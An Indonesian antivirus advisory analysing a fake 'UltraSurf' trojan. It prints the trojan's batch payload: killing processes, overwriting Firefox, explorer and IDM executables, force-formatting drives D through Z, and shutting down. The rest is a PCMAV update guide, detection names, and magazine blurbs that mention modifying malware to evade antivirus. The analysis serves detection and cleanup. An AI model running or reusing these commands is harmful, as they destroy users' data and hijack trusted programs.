UltraSurf. Beberapa waktu yang lalu, di forum virusindonesia.com ada salah seorang user yang sengaja mempublikasikan salah satu aplikasi dengan nama UltraSurf. Dengan mengatakan bahwa aplikasi UltraSurf ini dapat mem-bypass proxy dan membuat user bisa mengakses setiap website yang di blok. Sekilas aplikasi ini memang mirip aplikasi UltraSurf yang sebenarnya, tetapi hal buruklah yang akan user alami jika menggunakan aplikasi tipuan ini karena sudah dipastikan user akan kehilangan seluruh data di hard disknya.

A. Info File

Nama Worm : UltraSurf
Asal : Indonesia
Ukuran File : Random
Packer : UPX 0.89 – 3.xx -> Markus & Laszlo ver. [ 3.07 ]
Pemrograman : Delphi
Icon : Random
Tipe : Trojan, Worm

B. About Malware

Variant pertama dari UltraSurf kami dapatkan berasala dari Jakarta. Mungkin hanya buatan orang yang memang berniat untuk menghapus setiap data user yang terdapat pada drive lain selain drive C. Hal ini dimaksudkan agar malware tetap bisa menjalankan aksinya untuk memformat setiap drive setelah di jalankan.

Seperti yang terlihat pada gambar di atas, UltraSurf berasal dari Indonesia. Setelah di UnPack, sangat terlihat tujuan dari UltraSurf setelah dijalankan oleh user.

C. Companion/File yang dibuat

Setelah user menjalankan UltraSurf, malware ini akan membuat 1 buah file dengan nama ultrasurf.bat di folder temporary. Pada variant D, file bat yang dibuat menggunakan nama “alaskan ip.bat”. Batch file ini hanya bersifat sementara yang dibuat setelah UltraSurf di jalankan dan otomatis dihapus setelah selesai mengeksekusi seluruh perintahnya.

D. Hasil Infeksi
Dengan perintah-perintah bat file ini, jelas benar-benar terlihat apa saja yang akan dilakukan oleh UltraSurf.
Menghentikan proses dengan nama idman.exe, firefox.exe, explorer.exe

taskkill /f /im idman.exe
taskkill /f /im firefox.exe
taskkill /f /im explorer.exe

mengcopy file hostnya dan melakukan overwrite ke beberapa file seperti IDMan.exe, firefox.exe, explorer, explorer.exe

xcopy ultrasurf.exe /h /r /c /y “C:\Program Files\Internet Download Manager\IDMan.exe”
xcopy ultrasurf.exe /h /r /c /y “C:\Program Files\Mozilla Firefox\firefox.exe”
xcopy ultrasurf.exe /h /r /c /y “C:\windows\explorer”
xcopy ultrasurf.exe /h /r /c /y “C:\windows\explorer.exe”

Memformat semua hard disk mulai dari drive D sampai Z.

echo.
Format D: /Q /X /y
echo.
Format E: /Q /X /y
echo.
Format F: /Q /X /y
echo.
Format G: /Q /X /y
echo.
Format H: /Q /X /y
echo.
Format I: /Q /X /y
echo.
Format J: /Q /X /y
echo.
Format K: /Q /X /y
echo.
Format L: /Q /X /y
echo.
Format M: /Q /X /y
echo.
Format N: /Q /X /y
echo.
Format 0: /Q /X /y
echo.
Format P: /Q /X /y
echo.
Format Q: /Q /X /y
echo.
Format R: /Q /X /y
echo.
Format S: /Q /X /y
echo.
Format T: /Q /X /y
echo.
Format U: /Q /X /y
echo.
Format V: /Q /X /y
echo.
Format W: /Q /X /y
echo.
Format X: /Q /X /y
echo.
Format Y: /Q /X /y
echo.
Format Z: /Q /X /y

Dan yang terakhir adalah melakukan proses shuting down

start shutdown.exe -f -t 0 –s

Meskipun tidak membuat host untuk dijadikan startup, UltraSurf memanfaatkan user yang tidak tidak tahu bahwa file firefox.exe sudah di hapus dan digantikan dengan host UltraSurf. Selain itu IDMan.exe adalah salah satu file dari software Internet Download Manager yang di jalankan saat startup, jadi UltraSurf yang sudah mengganti file IDMan.exe dengan host buatannya akan berjalan saat startup.

E. Pembersihan

PCMAV 5.4 Update Build1

Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 5.4 Update Build1 telah hadir dengan penambahan 29 pengenal varian virus baru. Bagi Anda pengguna PCMAV 5.4, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.

Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan proxy, tentukan konfigurasi proxy pada file proxy.txt . Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih Update.

Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa link ini:

SendSpace.com

ZippyShare.com (mirror)

RapidShare.com (mirror)

Letakkan file hasil download tersebut (update.vdb) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Pastikan sekali lagi, bahwa nama file update adalah update.vdb, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.

Daftar tambahan virus hingga PCMAV 5.4 Update Build1:

Fandi.vbs.C
Fandi.vbs.C.inf
NgrBot
NgrBot.bat
NgrBot.dat
NgrBot.drp.A
NgrBot.drp.B
NgrBot.exe.A
NgrBot.exe.B
NgrBot.inf
NgrBot.lnk
Pluto.C
Pluto.C.drp
Pluto.C.htm
Redlof.vbs.B
Redlof.vbs.B.drp
Redlof.vbs.B.inf
RezaTera.B
RezaTera.B.drp
RezaTera.B.url
Rieysha-Jogja.E
Rieysha-Jogja.E.hosts
Rieysha-Jogja.E.vbs
UltraSurf.A
UltraSurf.A.bat
UltraSurf.B
UltraSurf.C
UltraSurf.D
UltraSurf.D.bat

taskkill /f /im idman.exe

Telah hadir edisi terbaru Majalah PC Media 08/2011 dengan Super DVD 8 GB, yang menyertakan juga antivirus kebanggaan Indonesia, PCMAV 5.4. Saat ini, PCMAV merupakan satu-satunya antivirus yang mampu mengenali 4.466 virus dan variannya yang dilaporkan banyak menyebar di Indonesia.

Segera dapatkan PCMAV 5.4 Valhalla terbaru yang telah disempurnakan hanya dari majalah PC Media 08/2011 yang telah terbit. Segera pesan dan dapatkan di kios/agen terdekat.

Pertanyaan teknis harap disampaikan langsung ke redaksi PC Media melalui e-mail dengan sebelumnya Anda telah membaca dan memahami isi README.TXT. Dan kami akan berterimakasih jika Anda dapat meluangkan waktu untuk memberikan komentar sebatas penggunaan PCMAV 5.4 ini sebagai masukan dalam pengembangannya.

APA YANG BARU?/CHANGE-LOG
UPDATED! Ditambahkan database pengenal dan pembersih 116 virus lokal/asing/varian baru yang dilaporkan menyebar di Indonesia. Total 4466 virus beserta variannya.
ADDED! Removal engine khusus untuk membersihkan secara tuntas virus Ramnit.L, Ramnit.M, dan OjanBlank.B yang menyebar luas di Indonesia.
ADDED! Removal engine khusus untuk memulihkan file JPEG yang terinfeksi virus Parents.
FIXED! Perbaikan dalam membuka dokumen Office pada removable disk apabila opsi Block Program On USB/Card tidak diaktifkan.
IMPROVED! Perubahan nama virus mengikuti varian baru yang ditemukan.
IMPROVED! Perbaikan beberapa minor bug dan improvisasi kode internal untuk memastikan bahwa PCMAV tetap menjadi antivirus kebanggaan Indonesia.

ARTIKEL MALWARE & REVERSE CODE ENGINEERING

Pada majalah PC Media 08/2011 ini, Anda dapat membaca artikel menyangkut Malware & Reverse Code Engineering (RCE):

Malware Dalam Dokumen.

Kebiasaan rutin dapat menjadi kelemahan. Setidaknya dalam perkembangan malware, kebiasaan-kebiasaan pengguna komputer terus dipelajari oleh pembuat malware agar dapat dimanfaatkan sebagai celah untuk menyusup. Salah satunya adalah menginfeksi dokumen yang sering digunakan pengguna umum. Artikel ini membahas bagaimana malware dapat menyusup ke berbagai jenis dokumen yang sering digunakan sehari-hari.

Modifikasi Malware.

“Menciptakan” malware baru yang berusaha melewati deteksi antivirus ternyata tidak selalu harus melalui pemrograman yang rumit. Cukup dengan memodifikasi malware yang sudah ada, maka lahirlah sebuah varian baru yang bisa jadi lolos dari pendeteksian sebagian antivirus yang sebelumnya mampu mendeteksi malware tersebut (sebelum dimodifikasi). Ikuti teknik-teknik modifikasi malware yang cukup mudah dilakukan pada artikel ini, siapa tahu mungkin Anda akan tertantang untuk menemukan cara pencegahannya.

Hacking Dengan Trojan Backdoor

Walaupun istilah trojan dan backdoor sudah dikenal lama, tetapi tipe malware inilah yang saat ini cukup menjadi ancaman serius, dipicu dengan perkembangan Internet yang cepat dan pengguna yang semakin banyak, membuat malware jenis ini menyebar dengan pesat dan berusaha mengeruk keuntungan finansial. Untuk itu, kenali ancaman tersebut lebih dekat, bagaimana cara kerja dan juga tips untuk mendeteksinya.